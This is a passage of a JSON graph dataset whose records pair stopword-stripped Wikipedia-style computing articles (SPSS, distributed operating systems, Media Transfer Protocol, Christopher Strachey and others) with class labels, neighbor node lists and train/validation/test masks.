follows silvermont based processor cores used knights landing versions intel xeon phi multiprocessor hpc chips changes hpc including avx-512 vector units",
    "neighbors": [
      3459,
      5380,
      2821,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      6926,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      5883,
      8231,
      1832,
      2088,
      10669,
      9391,
      5681,
      10675,
      4276,
      1461,
      10548,
      1083,
      2237,
      5309,
      8125,
      8126,
      6339,
      5444,
      9541,
      10440,
      1998,
      2638,
      977,
      5073,
      5844,
      9435,
      7134,
      1119,
      7783,
      1000,
      7657,
      1260,
      4204,
      5356,
      5871,
      8044,
      8684,
      9582,
      499,
      8820,
      3317,
      9970,
      10734,
      4217,
      4603,
      10620,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 5445,
    "label": 1,
    "text": "Multilingual_Multiscript_Plant_Name_Database:multilingual multiscript plant name database multilingual multiscript plant name database mmpnd multilingual database names taxa plants located university melbourne managed maintained michel h. porcher database includes names taxa 900 genera higher plants counting mushrooms addition scientific name synonyms contains names taxa 82 major languages website says includes 70 languages 40 languages dialects included mmpnd mentioned many taxa grin-global germplasm resources information network references porcher m. h. et al searchable world wide web multilingual multiscript plant name database mmpnd on-line resource pl names international plant names index ipni mentions multilingual multiscript plant name database searchable language script holds lot information including index medicinal plants regarding aims mmpnd following said ... intention cover many useful plants possible useful one part world however weed even noxious weed another political stand whether selection species declared useful people provided get minimum information handle data basically foresee 8 categories plants order decreasing importance consider vegetables cereals fruits mushrooms fungi herbs pasture fodder crops medicinal plants may termed utilitarian crops fibre oil crops stimulants etc feel last fifty years first 3 categories attracting far little attention taxonomists especially species level three groups edible plants include world staple foods related cultivars selections bred improved centuries basic ingredients world ethnic cuisines ... first objective focus useful plants cultivated ones database currently contains names plants economic importance well names savage plants genus last updating indicated multilingual names presented genera follows indexes plant names various languages en abutilon allium chinense amaranthus tricolor banana beetroot orange beta vulgaris black-eyed pea blood banana ... 95 citations ca 11 citations de ... 34 citations es ... 27 citations fr ... 28 citations",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5446,
    "label": 4,
    "text": "Illinois_Security_Lab:illinois security lab illinois security lab research laboratory university illinois urbana–champaign established 2004 support research education computer network security lab part computer science department information trust institute current research projects concern health information technology critical infrastructure protection past projects addressed messaging networking privacy lab performing work strategic healthcare advanced research projects security sharps project developing security privacy technologies help remove key barriers prevent use health information systems implementing electronic health records health information exchanges telemedicine networked control systems electric power grid use computers tasks like protecting substations overloads digital protective relays metering facilities advanced meters lab developed attested meter provide security privacy advanced meters worked security building automation systems substation automation advances networking distributed computing medical devices combining changes way health care financed growing number elderly people produce strong prospects widespread use assisted living health care approach benefit transferring medical information collected homes dedicated facilities clinicians data networks lab explored security engineering systems prototypes field trials formal methods based architecture uses partially trusted assisted living service provider alsp third party intermediary assisted persons clinicians scalable distributed systems demand ability express adapt diverse policies numerous distinct administrative domains lab introduced technologies messaging systems adaptive security policies based wsemail internet messaging implemented web service attribute-based messaging abm addressing based attributes recipients although significant progress formal analysis security integrity confidentiality relatively less progress treating denial-of-service attacks lab explored techniques based shared channel model envisions bandwidth limiting factor attacks focuses host-based counter-measures selective verification exploits adversary bandwidth limitations favor valid parties also developing new formal methods reasoning dynamic configuration vpns many new information technologies profound impact privacy threats provoked legislation calls deeper regulation lab developed ways treat privacy rules formally including better ways reason using formal methods conformance implications regulations quantify classify privacy attitudes control risks new technologies lab showed formally encode hipaa consent regulations using privacy apis analyzed model checking",
    "neighbors": [
      10020,
      2409,
      6698,
      939,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5447,
    "label": 9,
    "text": "Craig_Chambers:craig chambers craig chambers computer scientist google since 2007 prior professor department computer science engineering university washington received b.s degree computer science mit 1986 ph.d. computer science stanford 1992 best known influential research language self introduced prototypes alternative classes code-splitting compilation technique generates separate code paths fast general cases speed execution dynamically-typed programs",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5448,
    "label": 3,
    "text": "Motorola_G5_project:motorola g5 project motorola g5 project unsuccessful attempt around 2000-2001 create 64-bit powerpc processor successor motorola powerpc 7400 series roadmaps era designated powerpc 7500 suggested motorola working g5 chip said chip failed early stages mass production thus could widely made usable chip apple began producing 64-bit systems g5 brand used ibm powerpc 970 also known powerpc g5",
    "neighbors": [
      8102,
      336,
      3472,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 5449,
    "label": 8,
    "text": "Semantic_web_service:semantic web service semantic web service like conventional web services server end client–server system machine-to-machine interaction via world wide web semantic services component semantic web use markup makes data machine-readable detailed sophisticated way compared human-readable html usually easily understood computer programs mainstream xml standards interoperation web services specify syntactic interoperability semantic meaning messages example web services description language wsdl specify operations available web service structure data sent received specify semantic meaning data semantic constraints data requires programmers reach specific agreements interaction web services makes automatic web service composition difficult semantic web services built around universal standards interchange semantic data makes easy programmers combine data different sources services without losing meaning web services activated behind scenes web browser makes request web server uses various web services construct sophisticated reply would able semantic web services also used automatic programs run without connection web browser semantic-web-services platform uses owl web ontology language allow data service providers semantically describe resources using third-party ontologies sswap simple semantic web architecture protocol sswap establishes lightweight protocol owl classes predicates see sswap protocol concept canonical graph enable providers logically describe service service essentially transformation possibly null input subject possibly null output object services semantically discoverable based subsumption hierarchies well input output data types sadi semantic automated discovery integration semantic-web-service initiative consists set design-practices semantic-web-service publishing minimizes use non-standard protocols message structures sadi services natively consume data rdf resource description framework format input output data must instances owl individuals input output classes defined owl-dl unlike canonical web services sadi services use soap messaging protocol unlike sswap sadi services project-specific messaging scaffold services invoked passing rdf instance data service endpoint http post multiplexing achieved sending one owl individual http post invocation sadi imposes single constraint behavior service uri output individual must uri corresponding input individual practice results services create semantic linkages input output service thus chaining sadi services together workflow results uninterrupted linked data graph choreography concerned describing external visible behavior services set message exchanges optionally following message exchange pattern mep functionality consumer point view orchestration deals describing number services two cooperate communicate aim achieving common goal",
    "neighbors": [
      8929,
      10020,
      6629,
      8070,
      1481,
      3052,
      9871,
      11674,
      10452,
      2901,
      53,
      119,
      3000,
      10486,
      10938,
      4797,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 5450,
    "label": 9,
    "text": "SPSS:spss spss statistics software package used interactive batched statistical analysis long produced spss inc. acquired ibm 2009 current versions 2015 named ibm spss statistics software name originally stood statistical package social sciences spss reflecting original market although software popular fields well including health sciences marketing research hub published full-length freely accessible spss video tutorial playlist spss widely used program statistical analysis social science also used market researchers health researchers survey companies government education researchers marketing organizations data miners others original spss manual nie bent hull 1970 described one sociology influential books allowing ordinary researchers statistical analysis addition statistical analysis data management case selection file reshaping creating derived data data documentation metadata dictionary stored datafile features base software statistics included base software many features spss statistics accessible via pull-down menus programmed proprietary 4gl command syntax language command syntax programming benefits reproducible output simplifying repetitive tasks handling complex data manipulations analyses additionally complex applications programmed syntax accessible menu structure pull-down menu interface also generates command syntax displayed output although default settings changed make syntax visible user also pasted syntax file using paste button present menu programs run interactively unattended using supplied production job facility additionally macro language used write command language subroutines python programmability extension access information data dictionary data dynamically build command syntax programs python programmability extension introduced spss 14 replaced less functional sax basic scripts purposes although saxbasic remains available addition python extension allows spss run statistics free software package r. version 14 onwards spss driven externally python vb.net program using supplied plug-ins version 20 onwards two scripting facilities well many scripts included installation media normally installed default spss statistics places constraints internal file structure data types data processing matching files together considerably simplify programming spss datasets two-dimensional table structure rows typically represent cases individuals households columns represent measurements age sex household income two data types defined numeric text string data processing occurs sequentially case-by-case file dataset files matched one-to-one one-to-many many-to-many addition cases-by-variables structure processing separate matrix session one process data matrices using matrix linear algebra operations graphical user interface two views toggled clicking one two tabs bottom left spss statistics window 'data view shows spreadsheet view cases rows variables columns unlike spreadsheets data cells contain numbers text formulas stored cells 'variable view displays metadata dictionary row represents variable shows variable name variable label value label print width measurement type variety characteristics cells views manually edited defining file structure allowing data entry without using command syntax may sufficient small datasets larger datasets statistical surveys often created data entry software entered computer-assisted personal interviewing scanning using optical character recognition optical mark recognition software direct capture online questionnaires datasets read spss spss statistics read write data ascii text files including hierarchical files statistics packages spreadsheets databases spss statistics read write external relational database tables via odbc sql statistical output proprietary file format *.spv file supporting pivot tables addition in-package viewer stand-alone reader downloaded proprietary output exported text microsoft word pdf excel formats alternatively output captured data using oms command text tab-delimited text pdf xls html xml spss dataset variety graphic image formats jpeg png bmp emf several variants spss statistics exist spss statistics gradpacks highly discounted versions sold students spss statistics server version spss statistics client/server architecture add-on packages enhance base software additional features examples include complex samples adjust clustered stratified samples custom tables create publication-ready tables spss statistics available either annual monthly subscription license spss statistics launched version 25 aug 08 2017 spss v25 adds new advanced statistics random effects solution results genlinmixed robust standard errors glm/unianova profile plots error bars within advanced statistics custom tables add-on v25 also includes new bayesian statistics capabilities method statistical inference publication ready charts powerful new charting capabilities including new default templates ability share microsoft office applications software released first version 1968 statistical package social sciences spss developed norman h. nie dale h. bent c. hadlai hull principals incorporated spss inc. 1975 early versions spss statistics written fortran designed batch processing mainframes including example ibm icl versions originally using punched cards data program input processing run read command file spss commands either raw input file fixed format data single record type 'getfile data saved previous run save precious computer time 'edit run could done check command syntax without analysing data version 10 spss-x 1983 data files could contain multiple record types prior spss 16.0 different versions spss available windows mac os x unix spss statistics version 13.0 mac os x compatible intel-based macintosh computers due rosetta emulation software causing errors calculations spss statistics 15.0 windows needed downloadable hotfix installed order compatible windows vista version 16.0 version runs windows mac linux graphical user interface written java mac os version provided universal binary making fully compatible powerpc intel-based mac hardware spss inc announced july 28 2009 acquired ibm us 1.2 billion dispute ownership name spss 2009 2010 product referred pasw predictive analytics software january 2010 became spss ibm company complete transfer business ibm done october 1 2010 date spss ibm company ceased exist ibm spss fully integrated ibm corporation one brands ibm software group business analytics portfolio together ibm algorithmics ibm cognos ibm openpages companion software ibm spss family used data mining text analytics ibm spss modeler realtime credit scoring services ibm spss collaboration deployment services spss data collection spss dimensions sold 2015 unicom systems inc. division unicom global merged integrated software suite unicom intelligence survey design survey deployment data collection data management reporting ida interactive data analysis software package originated formerly national opinion research center norc university chicago initially offered hp-2000 somewhat later ownership spss also available dec decsystem-20 scss software product intended online use ibm mainframes although c conversational also represented distinction regarding data stored used column-oriented rather row-oriented internal database gave good interactive response time spss conversational statistical system scss whose strong point spss cross-tabulation",
    "neighbors": [
      10757,
      5129,
      7945,
      3980,
      2317,
      5006,
      6157,
      6797,
      7950,
      1042,
      4630,
      2457,
      7580,
      7326,
      4255,
      8606,
      9633,
      3493,
      9893,
      6311,
      6952,
      5677,
      2222,
      7983,
      10413,
      7217,
      6962,
      8627,
      5172,
      9397,
      823,
      696,
      10040,
      3771,
      8509,
      6718,
      6850,
      5830,
      5703,
      4808,
      5833,
      4042,
      847,
      2000,
      7767,
      8792,
      9944,
      859,
      2652,
      863,
      479,
      5857,
      8440,
      10848,
      2149,
      4840,
      6248,
      8554,
      363,
      5612,
      9455,
      10737,
      5492,
      7924,
      3960,
      3323,
      3196,
      3966,
      9599
    ],
    "mask": "Test"
  },
  {
    "node_id": 5451,
    "label": 2,
    "text": "Warmux:warmux warmux free open-source video game turn-based artillery game genre started wormux 2002 game renamed warmux november 2010 avoid potential trademark conflicts game multiplatform many desktop computer mobile platforms available several players play together typically one using team game played online every player uses version game 2 modes private mode one must provide opponents one address port public mode index server publish game online games available since 0.8beta1 supertuxkart teams styled mascots various free software projects gnu linux freebsd kde gimp openoffice.org firefox thunderbird suse workrave nufw spip bugzilla 0.9.0 cpu player selected single player gameplay allowing compete computer-driven teams feature first appeared 0.7.9 hidden due limited abilities project started december 2002 lawrence azzoug moy wormux game developed source code data free software distributed terms gnu general public license originally developed based clanlib library project later switched sdl due cross-platform sdl middle-layer game ported many oses platforms windows unix-like systems including linux freebsd android amigaos 4 aros maemo symbian^3 mac os x november 2010 old name nowiki /nowiki wormux nowiki /nowiki dropped favor nowiki /nowiki warmux nowiki /nowiki name nowiki /nowiki wormux nowiki /nowiki originally homage old classic worms games among popular artillery game genre developers decided renaming project order avoid possible confusion latest version 11.04.1 released 30th april 2011 community fell apart game development abandoned around 2012 domain name lost acquired cyber squatters project transferred gna.org repository could restart development warmux project went gna shutdown may 2017 critiques game generally positive raiden realm praised game similarity original worms games saying anyone ever loved played famous worms pc game series wormux game well noting even n't much fan ... 'll find wormux none less captivating enjoyable fosswire declared wormux makes formidable clone original series absolutely love wormux right minifrag.com said wormux loaded turn-based cartoon combat goodness netbook gamer wormux everything going also included linuxlinks listing 42 best free linux games well holding four five star rating linux game tome wormux selected september 2008 hotpick linux format game became quite popular packaged several linux distributions different versions game downloaded via gna 2009 march 2016 least 123,000 times",
    "neighbors": [
      10790,
      5612,
      6797,
      3791,
      10480,
      2769,
      6993,
      5397,
      823,
      11418
    ],
    "mask": "None"
  },
  {
    "node_id": 5452,
    "label": 2,
    "text": "Distributed_operating_system:distributed operating system distributed operating system software collection independent networked communicating physically separate computational nodes handle jobs serviced multiple cpus individual node holds specific software subset global aggregate operating system subset composite two distinct service provisioners first ubiquitous minimal kernel microkernel directly controls node hardware second higher-level collection system management components coordinate node individual collaborative activities components abstract microkernel functions support user applications microkernel management components collection work together support system goal integrating multiple resources processing functionality efficient stable system seamless integration individual nodes global system referred transparency single system image describing illusion provided users global system appearance single computational entity distributed os provides essential services functionality required os adds attributes particular configurations allow support additional requirements increased scale availability user distributed os works manner similar single-node monolithic operating system although consists multiple nodes appears users applications single-node separating minimal system-level functionality additional user-level modular services provides separation mechanism policy mechanism policy simply interpreted something done versus something done respectively separation increases flexibility scalability locale typically node kernel provides minimally complete set node-level utilities necessary operating node underlying hardware resources mechanisms include allocation management disposition node resources processes communication input/output management support functions within kernel communications sub-system foremost importance distributed os distributed os kernel often supports minimal set functions including low-level address space management thread management inter-process communication ipc kernel design referred microkernel modular nature enhances reliability security essential features distributed os common kernel identically replicated nodes system therefore nodes system use similar hardware combination minimal design ubiquitous node coverage enhances global system extensibility ability dynamically introduce new nodes services system management components software processes define node policies components part os outside kernel components provide higher-level communication process resource management reliability performance security components match functions single-entity system adding transparency required distributed environment distributed nature os requires additional services support node responsibilities global system addition system management components accept defensive responsibilities reliability availability persistence responsibilities conflict consistent approach balanced perspective deep understanding overall system assist identifying diminishing returns separation policy mechanism mitigates conflicts architecture design distributed operating system must realize individual node global system goals architecture design must approached manner consistent separating policy mechanism distributed operating system attempts provide efficient reliable distributed computing framework allowing absolute minimal user awareness underlying command control efforts multi-level collaboration kernel system management components turn distinct nodes distributed operating system functional challenge distributed operating system point system must maintain perfect harmony purpose simultaneously maintain complete disconnect intent implementation challenge distributed operating system opportunity produce foundation framework reliable efficient available robust extensible scalable system however opportunity comes high cost complexity distributed operating system exceptional degree inherent complexity could easily render entire system anathema user logical price realizing distributed operation system must calculated terms overcoming vast amounts complexity many areas many levels calculation includes depth breadth range design investment architectural planning required achieving even modest implementation design development considerations critical unforgiving instance deep understanding distributed operating system overall architectural design detail required exceptionally early point exhausting array design considerations inherent development distributed operating system design considerations potentially affect many others significant degree leads massive effort balanced approach terms individual design considerations many permutations aid effort rely documented experience research distributed computing power research experimentation efforts began earnest 1970s continued 1990s focused interest peaking late 1980s number distributed operating systems introduced period however implementations achieved even modest commercial success fundamental pioneering implementations primitive distributed operating system component concepts date early 1950s individual steps focused directly distributed computing time many may realized important impact pioneering efforts laid important groundwork inspired continued research areas related distributed computing mid-1970s research produced important advances distributed computing breakthroughs provided solid stable foundation efforts continued 1990s accelerating proliferation multi-processor multi-core processor systems research led resurgence distributed os concept one first efforts dyseac general-purpose synchronous computer one earliest publications association computing machinery april 1954 researcher national bureau standards national institute standards technology nist presented detailed specification dyseac introduction focused upon requirements intended applications including flexible communications also mentioned computers specification discussed architecture multi-computer systems preferring peer-to-peer rather master-slave one earliest examples computer distributed control dept army reports certified reliable passed acceptance tests april 1954 completed delivered time may 1954 portable computer housed tractor-trailer 2 attendant vehicles 6 tons refrigeration capacity described experimental input-output system lincoln tx-2 emphasized flexible simultaneously operational input-output devices i.e. multiprogramming design tx-2 modular supporting high degree modification expansion system employed multiple-sequence program technique technique allowed multiple program counters associate one 32 possible sequences program code explicitly prioritized sequences could interleaved executed concurrently affecting computation process also control flow sequences switching devices well much discussion related device sequencing similar dyseac tx-2 separately programmed devices operate simultaneously increasing throughput full power central unit available device tx-2 another example system exhibiting distributed control central unit dedicated control one early effort abstracting memory access intercommunicating cells cell composed collection memory elements memory element basically binary electronic flip-flop relay within cell two types elements symbol cell cell structure stores data string symbols consisting name set parameters information linked cell associations theory contended addressing wasteful non-valuable level indirection information accessed two ways direct cross-retrieval direct retrieval accepts name returns parameter set cross-retrieval projects parameter sets returns set names containing given subset parameters similar modified hash table data structure allowed multiple values parameters key name configuration ideal distributed systems constant-time projection memory storing retrieval inherently atomic exclusive cellular memory intrinsic distributed characteristics would invaluable impact user hardware/device application programming interfaces indirect authors considering distributed systems stating algorithms scalable synchronization shared-memory multiprocessors measurements distributed file system memory coherence shared virtual memory systems transactions transactional memory composable memory transactions transactional memory architectural support lock-free data structures software transactional memory dynamic-sized data structures software transactional memory oceanstore architecture global-scale persistent storage weighted voting replicated data sanity checks byzantine generals problem fail-stop processors approach designing fault-tolerant computing systems recoverability distributed snapshots determining global states distributed systems optimistic recovery distributed systems better illustrate point examine three system architectures centralized decentralized distributed examination consider three structural aspects organization connection control organization describes system physical arrangement characteristics connection covers communication pathways among nodes control manages operation earlier two considerations centralized system one level structure constituent elements directly depend upon single control element decentralized system hierarchical bottom level unites subsets system entities entity subsets turn combine higher levels ultimately culminating central master element distributed system collection autonomous elements concept levels centralized systems connect constituents directly central master entity hub spoke fashion decentralized system aka network system incorporates direct indirect paths constituent elements central entity typically configured hierarchy one shortest path two elements finally distributed operating system requires pattern direct indirect connections possible two elements consider 1970s phenomena “ string art ” spirograph drawing fully connected system spider web interstate highway system u.s. cities examples partially connected system centralized decentralized systems directed flows connection central entity distributed systems communicate along arbitrary paths pivotal notion third consideration control involves allocating tasks data system elements balancing efficiency responsiveness complexity centralized decentralized systems offer control potentially easing administration limiting options distributed systems difficult explicitly control scale better horizontally offer fewer points system-wide failure associations conform needs imposed design organizational chaos transparency single-system image refers ability application treat system operates without regard whether distributed without regard hardware implementation details many areas system benefit transparency including access location performance naming migration consideration transparency directly affects decision making every aspect design distributed operating system transparency impose certain requirements and/or restrictions design considerations systems optionally violate transparency varying degrees meet specific application requirements example distributed operating system may present hard drive one computer c drive another computer g user require knowledge device drivers drive location devices work way application perspective less transparent interface might require application know computer hosts drive transparency domains inter-process communication ipc implementation general communication process interaction dataflow threads and/or processes within node nodes distributed os intra-node inter-node communication requirements drive low-level ipc design typical approach implementing communication functions support transparency sense interprocess communication greatest underlying concept low-level design considerations distributed operating system process management provides policies mechanisms effective efficient sharing resources distributed processes policies mechanisms support operations involving allocation de-allocation processes ports processors well mechanisms run suspend migrate halt resume process execution resources operations either local remote respect distributed os maintains state synchronization processes system example load balancing common process management function load balancing monitors node performance responsible shifting activity across nodes system balance one load balancing function picking process move kernel may employ several selection mechanisms including priority-based choice mechanism chooses process based policy 'newest request system implements policy systems resources memory files devices etc distributed throughout system given moment nodes may light idle workloads load sharing load balancing require many policy-oriented decisions ranging finding idle cpus move move many algorithms exist aid decisions however calls second level decision making policy choosing algorithm best suited scenario conditions surrounding scenario distributed os provide necessary resources services achieve high levels reliability ability prevent and/or recover errors faults physical logical defects cause errors system system reliable must somehow overcome adverse effects faults primary methods dealing faults include fault avoidance fault tolerance fault detection recovery fault avoidance covers proactive measures taken minimize occurrence faults proactive measures form transactions replication backups fault tolerance ability system continue operation presence fault event system detect recover full functionality event actions taken make every effort preserve single system image availability fraction time system respond requests many benchmark metrics quantify performance throughput response time job completions per unit time system utilization etc respect distributed os performance often distills balance process parallelism ipc managing task granularity parallelism sensible relation messages required support extremely effective also identifying beneficial migrate process data rather copy data effective well cooperating concurrent processes inherent need synchronization ensures changes happen correct predictable fashion three basic situations define scope need improper synchronization lead multiple failure modes including loss atomicity consistency isolation durability deadlock livelock loss serializability flexibility distributed operating system enhanced modular characteristics distributed os providing richer set higher-level services completeness quality kernel/microkernel simplifies implementation services potentially enables service providers greater choice providers services architectural design e1 distributed operating system cronus distributed operating system design development minix distributed operating system",
    "neighbors": [
      9224,
      9739,
      6675,
      7187,
      10776,
      25,
      1049,
      5658,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      2120,
      10333,
      97,
      8298,
      7285,
      118,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      3729,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      8901,
      9932,
      5840,
      7382,
      8410,
      1253,
      11501,
      5363,
      2811,
      10499,
      1801,
      1804,
      11533,
      273,
      11539,
      10016,
      7975,
      2345,
      7983,
      823,
      4409,
      7483,
      10048,
      4417,
      11075,
      3398,
      4423,
      7497,
      5457,
      11601,
      10590,
      8551,
      5492,
      2936,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      4525,
      11184,
      10675,
      6075,
      6078,
      3007,
      9151,
      8136,
      3031,
      5598,
      6128,
      5619,
      3066,
      10235,
      11262
    ],
    "mask": "None"
  },
  {
    "node_id": 5453,
    "label": 4,
    "text": "Cruise_ship_ID_card:cruise ship id card cruise ship id card plastic card size credit card serves several functions passengers cruise ship cruise ship id cards scanned entrances ship various points throughout ship either via magnetic strip rfid readers bar code order identify passenger allow entry exit ship allow entry certain areas ship including passenger cabin bill purchases passenger various functions information printed ship card may include rare picture passenger displayed card frequently scanned presence computer display picture passenger screen functions ship card may include",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5454,
    "label": 2,
    "text": "Media_Transfer_Protocol:media transfer protocol media transfer protocol mtp extension picture transfer protocol ptp communications protocol allows media files transferred atomically portable devices whereas ptp designed downloading photographs digital cameras media transfer protocol allows transfer music files digital audio players media files portable media players well personal information personal digital assistants mtp key part wmdrm10-pd digital rights management drm service windows media platform mtp part windows media framework thus closely related windows media player versions microsoft windows operating system windows xp sp2 support mtp windows xp requires windows media player 10 higher later windows versions built-in support microsoft also made available mtp porting kit older versions windows back windows 98 usb implementers forum device working group standardised mtp full-fledged universal serial bus usb device class may 2008 since mtp official extension ptp shares class code main purpose protocol allow transfer media files associated metadata portable devices one transfer function time support operations open edit modify workaround copy hosting system operations copy back protocol originally implemented use across usb extended use across tcp/ip bluetooth windows vista supports mtp tcp/ip windows 7 windows vista platform update windows vista also support mtp bluetooth host connecting mtp device called mtp initiator whereas device mtp responder main reason using mtp rather example usb mass-storage device class msc latter operates granularity mass storage device block usually practice fat block rather logical file level words usb mass storage class designed give host computer undifferentiated access bulk mass storage compact flash rather file system might safely shared target device except specific files host might modifying/accessing practice therefore usb host computer mounted msc partition assumes absolute control storage may safely modified device without risk data corruption host computer severed connection furthermore host computer full control connected storage device risk host computer may corrupt file system reformat file system supported usb device otherwise modify way usb device completely understand mtp ptp specifically overcome issue making unit managed storage local file rather entire possibly large unit mass storage block level way mtp works like transactional file system either entire file written/read nothing storage media affected failed transfers device maintains database/index content disk mtp saves cost re-scanning entire disk every time content modified additionally mtp allows mtp initiators identify specific capabilities device respect file formats functionality particular mtp initiators may provide passwords information unlock files otherwise enable digital rights management nothing specific nature core standard features available via vendor extensions mtpz zune extension mtp specifically denies access files authentication processed possible using windows media player 10 higher mtp advantages marked “ ” disadvantages marked “ ” exposing filesystem metadata index integrity full control device unless operating system exposes mtp devices virtual file systems occur natively windows thus mtp devices assigned drive letters mtp-unaware software able make use devices limiting user mtp-specific programs one specific concern antivirus software host computer may aware mtp devices making potentially less secure mass storage devices although files mtp devices copied moved host use mtp-unaware antivirus software chance scan antivirus scanning might also impractical due blocking regular use device despite identifiability ptp/mtp usb device class libmtp documentation indicates vendor product id combination plays functional role identifying mtp device also windows drivers libmtp includes vast listings vendor product id numbers devices supports along workarounds bugs non-generic methodology hinders mtp drivers forward compatibility new devices mtp specification includes enumeration file formats called object format use enumeration communicating supported file formats formats transferred files apart uncategorized formats beginning list formats grouped categories image audio video document formats category one undefined format followed specific formats also super-generic undefined object format jolla cited lack webm support mtp one reason support video format mobile operating system sailfish os unclear limitation tools spec webm defined mtp 1.1 spec features used efficient alternatives whole-file transfers re-uploads mtp 1.1 spec according go-mtpfs mtp supported windows xp windows media player 10 later versions installed windows vista later mtp support built older versions windows specifically windows 2000 windows 98 windows microsoft released mtp porting kit contains mtp device driver manufacturers creative technology also provide legacy mtp drivers players usually consist mtp porting kit files customized inf file describing specific players mtp-compatible devices assigned drive letters instead appear devices applications windows explorer compared devices implement usb mass storage devices accessed programmatically scripts normal windows programs depend drive letters instead files must manipulated using windows explorer applications specially written mtp support windows mtp-compatible devices support feature called auto sync lets users configure windows media player automatically transfer copied newly acquired content devices whenever connected provided content compatible windows media player auto sync customizable player transfer content meets certain criteria songs rated four stars higher instance changes made file properties user rating file playback counts device propagated back computer device reconnected copies files accessed mtp may remain host computer even reboot accessible user account accessed well user accounts able read user account files including administrative users windows 7 sensor platform supports sensors built mtp-compatible devices free open-source implementation media transfer protocol available libmtp library incorporates product device ids many sources commonly used software mtp support gnome applications like gnome files formerly called nautilus archive manager formerly called file-roller use gio-based gvfs access files mtp devices proper mtp support added gvfs version 1.15.2 2013-01-15 philip langdale early patches gvfs enable google direct i/o extensions available kde project develops mtp kio slave similar level integration gvfs related gnome kde *nix graphical mtp-capable media player gmtp several tools provide fuse based file system mounting mtp devices within unix filesystem hierarchy making accessible program operates files directories examples include mtpfs jmtpfs go-mtpfs simple-mtpfs macos built-in support mtp application digital images third-party drivers mount mtp devices drives also several third-party file transfer applications available mac os x v10.5 later later versions several operating systems including amigaos android aros morphos symbian os support mtp sometimes additional drivers software disadvantage mtp devices android compared usb mass storage although file timestamps preserved copying files android device one computer copying direction file modification timestamps replaced time copy done companies including creative technology intel iriver samsung electronics manufacture devices based microsoft portable media center specification widely adopted mtp supporting devices introduced 2004 consumer electronics show initial period uncertain reactions several large media player producers creative technology iriver adopted mtp protocol place protocols many devices audio software applications support mtp",
    "neighbors": [
      2432,
      9762,
      2213,
      1098,
      4459,
      6797,
      5103,
      7983,
      8080,
      11184,
      3923,
      10229,
      8246,
      823,
      8410,
      1083
    ],
    "mask": "Train"
  },
  {
    "node_id": 5455,
    "label": 3,
    "text": "One_Per_Desk:one per desk one per desk opd innovative hybrid personal computer/telecommunications terminal based hardware sinclair ql one per desk built international computers limited icl launched uk 1984 result collaborative project icl sinclair research british telecom begun 1981 originally intended incorporate sinclair flat-screen crt technology rebadged versions opd sold united kingdom merlin tonto australia telecom australia computerphone ql opd borrowed 68008 cpu zx8301/8302 ulas 128 kb ram dual microdrives re-engineered icl greater reliability 8049 intelligent peripheral controller unique opd telephony module incorporating intel 8051 microcontroller also controlled keyboard two pstn lines v.21/v.23 modem plus built-in telephone handset ti tms5220 speech synthesiser automatic answering incoming calls opd supplied either 9-inch monochrome white monitor 14-inch colour monitor monitors also housed power supply opd later 3.5 floppy disk drives also available third-party vendors icl preferred supplier uk local government opds found way onto desks council officers due cost tended issued senior often elderly interest computers secretaries handle administrative work many devices simply used telephones system firmware bfs basic functional software unrelated ql qdos operating system although subset superbasic provided microdrive cartridge bfs provided application-switching voice/data call management call answering phone number directories viewdata terminal emulation simple calculator psion applications suite bundled ql also ported opd xchange available optional rom pack optional application software available rom included various terminal emulators satellite computing icl7561 emulator plus action diary presentation software address book inter-opd communications utilities icl supplied application used synchronise national bingo game across hundreds bingo halls uk integral v.23 dialup modem used provide remote communications central server several uk icl mainframe series 39 customers local government ministry defence sectors used statistics applications opd systems view graphical representations mainframe reports integral v.23 modem used download mainframe british telecom business systems sold opd merlin m1800 tonto bt intended tonto centralised desktop information system able access online services mainframes similar systems bt telephone network tonto retailed £1,500 launch opd peripherals software rom cartridges also badged merlin brand bt withdrew support tonto february 1993 name tonto derived outstanding new telecoms opportunity enhanced version opd produced small numbers united states market 68008fn cpu 256 kb ram standard rs-232 port enhanced firmware telephone answering function female voice slight new jersey accent",
    "neighbors": [
      512,
      1121,
      3936,
      5730,
      7269,
      3594,
      10666,
      8524,
      2541,
      406,
      4151,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5456,
    "label": 9,
    "text": "Christopher_Strachey:christopher strachey christopher s. strachey 16 november 1916 – 18 may 1975 british computer scientist one founders denotational semantics pioneer programming language design member strachey family prominent government arts administration academia christopher strachey born 16 november 1916 oliver strachey rachel ray costelloe hampstead england oliver strachey son richard strachey great grandson sir henry strachey 1st baronet elder sister writer barbara strachey 1919 family moved 51 gordon square stracheys belonged bloomsbury group whose members included virginia woolf john maynard keynes christopher uncle lytton strachey 13 christopher went gresham school holt showed signs brilliance general performed poorly admitted king college cambridge college alan turing 1935 continued neglect studies strachey studied mathematics transferred physics end third year cambridge strachey suffered nervous breakdown possibly related coming terms homosexuality returned cambridge managed lower second natural sciences tripos unable continue education christopher joined standard telephones cables stc research physicist first job providing mathematical analysis design electron tubes used radar complexity calculations required use differential analyser initial experience computing machine sparked strachey interest began research topic application research degree university cambridge rejected strachey continued work stc throughout second world war war fulfilled long-standing ambition becoming schoolmaster st edmund school canterbury teaching mathematics physics three years later able move prestigious harrow school 1949 stayed three years january 1951 friend introduced mike woodger national physical laboratory npl lab successfully built reduced version alan turing automatic computing engine ace concept dated 1945 pilot ace spare time strachey developed program game draughts also known checkers finished preliminary version may 1951 game completely exhausted pilot ace memory draughts program tried run first time 30 july 1951 npl unsuccessful due program errors strachey heard manchester mark 1 much bigger memory asked former fellow-student alan turing manual transcribed program operation codes machine around october 1951 summer 1952 program could play complete game draughts reasonable speed strachey programmed first ever music performed computer rendition british national anthem mark ii manchester electronic computer manchester 1951 later year short extracts three pieces recorded bbc outside 